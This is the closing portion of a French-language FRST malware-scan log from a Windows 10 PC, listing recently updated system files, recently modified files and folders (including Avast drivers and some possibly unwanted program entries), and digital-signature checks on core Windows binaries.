C:\WINDOWS\SysWOW64\DictationManager.dll 2017-05-30 00:35 - 2017-05-20 10:21 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll 2017-05-30 00:35 - 2017-05-20 10:21 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2017-05-30 00:35 - 2017-05-20 10:21 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll 2017-05-30 00:35 - 2017-05-20 10:20 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2017-05-30 00:35 - 2017-05-20 10:20 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-05-30 00:35 - 2017-05-20 10:20 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-05-30 00:35 - 2017-05-20 10:20 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll 2017-05-30 00:35 - 2017-05-20 10:19 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2017-05-30 00:35 - 2017-05-20 10:18 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2017-05-30 00:35 - 2017-05-20 10:17 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll 2017-05-30 00:35 - 2017-05-20 10:17 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2017-05-30 00:35 - 2017-05-20 10:17 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-05-30 00:35 - 2017-05-20 10:17 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-05-30 00:35 - 2017-05-20 10:16 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-05-30 00:35 - 2017-05-20 10:16 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-05-30 00:35 - 2017-05-20 10:16 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2017-05-30 00:35 - 2017-05-20 10:16 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll 2017-05-30 00:35 - 2017-05-20 10:15 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll 2017-05-30 00:35 - 2017-05-20 10:14 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll 2017-05-30 00:35 - 2017-05-20 10:14 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2017-05-30 00:35 - 2017-05-20 10:14 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll 2017-05-30 00:35 - 2017-05-20 10:14 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2017-05-30 00:35 - 2017-05-20 10:14 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll 2017-05-30 00:35 - 2017-05-20 10:11 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2017-05-30 00:35 - 2017-05-20 10:10 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll 2017-05-30 00:35 - 2017-05-20 10:10 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll 2017-05-30 00:35 - 2017-05-20 10:08 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll 2017-05-30 00:35 - 2017-05-20 09:08 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2017-05-30 00:35 - 2017-05-20 09:07 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2017-05-30 00:35 - 2017-05-20 09:03 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-05-30 00:35 - 2017-05-20 08:58 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2017-05-30 00:35 - 2017-05-20 08:55 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2017-05-30 00:35 - 2017-05-20 08:55 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2017-05-30 00:35 - 2017-05-20 08:55 - 01055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2017-05-30 00:35 - 2017-05-20 08:54 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys 2017-05-30 00:35 - 2017-05-20 08:54 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2017-05-30 00:35 - 2017-05-20 08:54 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys 2017-05-30 00:35 - 2017-05-20 08:53 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-05-30 00:35 - 2017-05-20 08:53 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys 2017-05-30 00:35 - 2017-05-20 08:53 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-05-30 00:35 - 2017-05-20 08:52 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2017-05-30 00:35 - 2017-05-20 08:52 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2017-05-30 00:35 - 2017-05-20 08:51 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2017-05-30 00:35 - 2017-05-20 08:51 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2017-05-30 00:35 - 2017-05-20 08:51 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2017-05-30 00:35 - 2017-05-20 08:51 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2017-05-30 00:35 - 2017-05-20 08:48 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-05-30 00:35 - 2017-05-20 08:10 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll 2017-05-30 00:35 - 2017-05-20 08:10 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll 2017-05-30 00:35 - 2017-05-20 08:08 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2017-05-30 00:35 - 2017-05-20 08:08 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys 2017-05-30 00:35 - 2017-05-20 08:07 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys 2017-05-30 00:35 - 2017-05-20 08:07 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll 2017-05-30 00:35 - 2017-05-20 08:07 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe 2017-05-30 00:35 - 2017-05-20 08:06 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll 2017-05-30 00:35 - 2017-05-20 08:06 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll 2017-05-30 00:35 - 2017-05-20 08:05 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-05-30 00:35 - 2017-05-20 08:03 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2017-05-30 00:35 - 2017-05-20 08:01 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-05-30 00:35 - 2017-05-20 08:01 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-05-30 00:35 - 2017-05-20 08:00 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2017-05-30 00:35 - 2017-05-20 08:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-05-30 00:35 - 2017-05-20 07:59 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2017-05-30 00:35 - 2017-05-20 07:58 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2017-05-30 00:35 - 2017-05-20 07:58 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll 2017-05-30 00:35 - 2017-05-20 07:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll 2017-05-30 00:35 - 2017-05-20 07:58 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll 2017-05-30 00:35 - 2017-05-20 07:58 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-05-30 00:35 - 2017-05-20 07:55 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-05-30 00:35 - 2017-05-20 07:54 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll 2017-05-30 00:35 - 2017-05-20 07:54 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2017-05-30 00:35 - 2017-05-20 07:54 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2017-05-30 00:35 - 2017-05-20 07:52 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll 2017-05-30 00:35 - 2017-05-20 07:52 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2017-05-30 00:35 - 2017-05-20 07:51 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2017-05-30 00:35 - 2017-05-20 07:51 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll 2017-05-30 00:35 - 2017-05-20 07:50 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll 2017-05-30 00:34 - 2017-05-20 10:29 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-05-30 00:34 - 2017-05-20 09:08 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2017-05-30 00:34 - 2017-05-20 08:59 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys 2017-05-30 00:34 - 2017-05-20 08:56 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-05-30 00:34 - 2017-05-20 08:56 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-05-30 00:34 - 2017-05-20 08:56 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2017-05-30 00:34 - 2017-05-20 08:55 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll 2017-05-30 00:34 - 2017-05-20 08:55 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-05-30 00:34 - 2017-05-20 08:55 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-05-30 00:34 - 2017-05-20 08:53 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2017-05-30 00:34 - 2017-05-20 08:53 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-05-30 00:34 - 2017-05-20 08:51 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-05-30 00:34 - 2017-05-20 08:10 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-05-30 00:34 - 2017-05-20 08:10 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll 2017-05-30 00:34 - 2017-05-20 08:10 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys 2017-05-30 00:34 - 2017-05-20 08:09 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2017-05-30 00:34 - 2017-05-20 08:09 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2017-05-30 00:34 - 2017-05-20 08:09 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll 2017-05-30 00:34 - 2017-05-20 08:08 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll 2017-05-30 00:34 - 2017-05-20 08:06 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll 2017-05-30 00:34 - 2017-05-20 08:05 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-05-30 00:34 - 2017-05-20 08:03 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll 2017-05-30 00:34 - 2017-05-20 08:03 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll 2017-05-30 00:34 - 2017-05-20 08:03 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-05-30 00:34 - 2017-05-20 08:03 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll 2017-05-30 00:34 - 2017-05-20 08:03 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-05-30 00:34 - 2017-05-20 08:02 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll 2017-05-30 00:34 - 2017-05-20 08:02 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll 2017-05-30 00:34 - 2017-05-20 08:01 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll 2017-05-30 00:34 - 2017-05-20 08:01 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll 2017-05-30 00:34 - 2017-05-20 08:01 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2017-05-30 00:34 - 2017-05-20 08:01 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-05-30 00:34 - 2017-05-20 08:01 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll 2017-05-30 00:34 - 2017-05-20 08:01 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll 2017-05-30 00:34 - 2017-05-20 08:00 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll 2017-05-30 00:34 - 2017-05-20 08:00 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2017-05-30 00:34 - 2017-05-20 08:00 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-05-30 00:34 - 2017-05-20 07:59 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2017-05-30 00:34 - 2017-05-20 07:59 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-05-30 00:34 - 2017-05-20 07:59 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2017-05-30 00:34 - 2017-05-20 07:59 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll 2017-05-30 00:34 - 2017-05-20 07:59 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-05-30 00:34 - 2017-05-20 07:59 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-05-30 00:34 - 2017-05-20 07:58 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-05-30 00:34 - 2017-05-20 07:57 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-05-30 00:34 - 2017-05-20 07:56 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe 2017-05-30 00:34 - 2017-05-20 07:56 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2017-05-30 00:34 - 2017-05-20 07:55 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2017-05-30 00:34 - 2017-05-20 07:55 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-05-30 00:34 - 2017-05-20 07:55 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2017-05-30 00:34 - 2017-05-20 07:54 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2017-05-30 00:34 - 2017-05-20 07:54 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll 2017-05-30 00:34 - 2017-05-20 07:52 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-05-30 00:34 - 2017-05-20 07:52 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-05-30 00:34 - 2017-05-20 07:50 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll 2017-05-30 00:34 - 2017-05-20 07:48 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2017-05-30 00:34 - 2017-05-20 07:48 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll 2017-05-30 00:34 - 2017-05-20 07:47 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll 2017-05-30 00:34 - 2017-05-20 07:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll ==================== Un mois - Modifiés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2017-06-29 11:20 - 2017-03-25 19:38 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll 2017-06-29 11:20 - 2016-10-16 16:37 - 00000000 __SHD C:\Users\Anaëlle Jolivet\IntelGraphicsProfiles 2017-06-29 11:19 - 2017-05-14 09:42 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-06-29 11:19 - 2017-05-14 09:15 - 00411208 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-06-29 00:04 - 2017-05-14 09:15 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-06-28 23:21 - 2017-05-14 09:42 - 00004268 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update 2017-06-28 23:15 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF 2017-06-28 23:11 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI 2017-06-28 21:34 - 2017-05-14 09:20 - 00000000 ____D C:\Users\Anaëlle Jolivet 2017-06-28 21:06 - 2017-05-14 09:38 - 00000966 _____ C:\Users\Public\Documents\temp.dat 2017-06-28 20:20 - 2017-04-11 13:20 - 00000000 ____D C:\WINDOWS\system32\log 2017-06-28 20:20 - 2017-03-25 19:38 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys 2017-06-28 20:08 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-06-28 20:08 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-06-28 16:16 - 2016-03-18 15:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-06-28 14:00 - 2017-05-14 09:42 - 00004048 _____ C:\WINDOWS\System32\Tasks\SafeZone scheduled Autoupdate 1491398457 2017-06-28 14:00 - 2017-04-05 15:21 - 00001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk 2017-06-28 13:57 - 2017-04-05 15:20 - 00041800 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswKbd.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 01015848 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSnx.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00585608 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00360792 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswVmm.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00343264 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\aswbloga.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00319984 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\aswbidsdrivera.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00198944 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\aswbidsha.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00198768 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswStm.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00146664 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00110352 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00084392 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRvrt.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00057704 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\aswbuniva.sys 2017-06-28 13:57 - 2017-04-05 15:16 - 00046984 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHwid.sys 2017-06-28 13:57 - 2016-10-23 16:20 - 00000000 ____D C:\ProgramData\AVAST Software 2017-06-28 11:26 - 2017-04-11 13:26 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\LocalLow\Mozilla 2017-06-25 11:31 - 2016-06-25 06:01 - 00000000 ____D C:\Program Files (x86)\Microsoft Office 2017-06-25 11:21 - 2017-05-14 09:42 - 02449806 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-06-25 11:21 - 2017-03-20 07:10 - 01147376 _____ C:\WINDOWS\system32\perfh00C.dat 2017-06-25 11:21 - 2017-03-20 07:10 - 00248798 _____ C:\WINDOWS\system32\perfc00C.dat 2017-06-21 16:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-06-21 13:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-06-21 12:51 - 2016-02-13 15:20 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-06-21 12:48 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-06-13 23:29 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-06-13 23:29 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-06-13 21:06 - 2016-10-18 21:14 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-06-13 21:01 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-06-13 21:01 - 2016-10-18 21:14 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-06-13 18:16 - 2016-06-25 06:22 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2017-06-13 18:09 - 2016-10-28 18:05 - 00000000 ____D C:\ProgramData\SlySoft 2017-06-13 18:09 - 2016-03-18 15:39 - 00000000 ____D C:\ProgramData\Package Cache 2017-06-13 18:07 - 2016-10-16 16:38 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\Packages 2017-06-13 00:53 - 2017-05-08 13:55 - 00000000 ____D C:\Users\Public\Documents\temp 2017-06-11 12:27 - 2017-05-28 22:54 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Roaming\CyberLink 2017-06-11 12:16 - 2016-06-25 07:22 - 00000000 ____D C:\Users\Public\CyberLink 2017-06-11 12:16 - 2016-06-25 07:22 - 00000000 ____D C:\ProgramData\CyberLink 2017-06-03 08:32 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-06-03 08:32 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-06-02 15:41 - 2017-05-14 09:42 - 00003692 _____ C:\WINDOWS\System32\Tasks\Milimili 2017-06-01 16:52 - 2017-03-25 19:30 - 00000000 ____D C:\Program Files (x86)\Dedoly 2017-05-31 23:01 - 2017-03-04 22:58 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Roaming\XnView 2017-05-31 23:00 - 2016-12-17 20:08 - 00000000 ____D C:\ProgramData\tmp 2017-05-31 18:37 - 2016-10-16 16:44 - 00000000 ___RD C:\Users\Anaëlle Jolivet\OneDrive 2017-05-31 00:22 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-05-31 00:22 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-05-31 00:22 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-05-31 00:21 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender 2017-05-31 00:21 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-05-31 00:21 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-05-31 00:21 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer ==================== Fichiers à la racine de certains dossiers ======= 2017-04-08 16:07 - 2017-04-08 16:07 - 0000218 _____ () C:\Users\Anaëlle Jolivet\AppData\Local\recently-used.xbel 2017-05-14 09:19 - 2017-05-14 09:19 - 0000000 ____H () C:\ProgramData\DP45977C.lfl Fichiers à déplacer ou supprimer: ==================== C:\Users\Anaëlle Jolivet\ZHPDiag3.exe ==================== Bamital & volsnap ====================== (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) C:\WINDOWS\system32\winlogon.exe => Le fichier est signé numériquement C:\WINDOWS\system32\wininit.exe => Le fichier est signé numériquement C:\WINDOWS\explorer.exe => Le fichier est signé numériquement C:\WINDOWS\SysWOW64\explorer.exe => Le fichier est signé numériquement C:\WINDOWS\system32\svchost.exe => Le fichier est signé numériquement C:\WINDOWS\SysWOW64\svchost.exe => Le fichier est signé numériquement C:\WINDOWS\system32\services.exe => Le fichier est signé numériquement C:\WINDOWS\system32\User32.dll => Le fichier est signé numériquement C:\WINDOWS\SysWOW64\User32.dll => Le fichier est signé numériquement C:\WINDOWS\system32\userinit.exe => Le fichier est signé numériquement C:\WINDOWS\SysWOW64\userinit.exe => Le fichier est signé numériquement C:\WINDOWS\system32\rpcss.dll => Le fichier est signé numériquement C:\WINDOWS\system32\dnsapi.dll => Le fichier est signé numériquement C:\WINDOWS\SysWOW64\dnsapi.dll => Le fichier est signé numériquement C:\WINDOWS\system32\Drivers\volsnap.sys => Le fichier est signé numériquement LastRegBack: 2017-06-25 15:53 ==================== Fin de FRST.txt ============================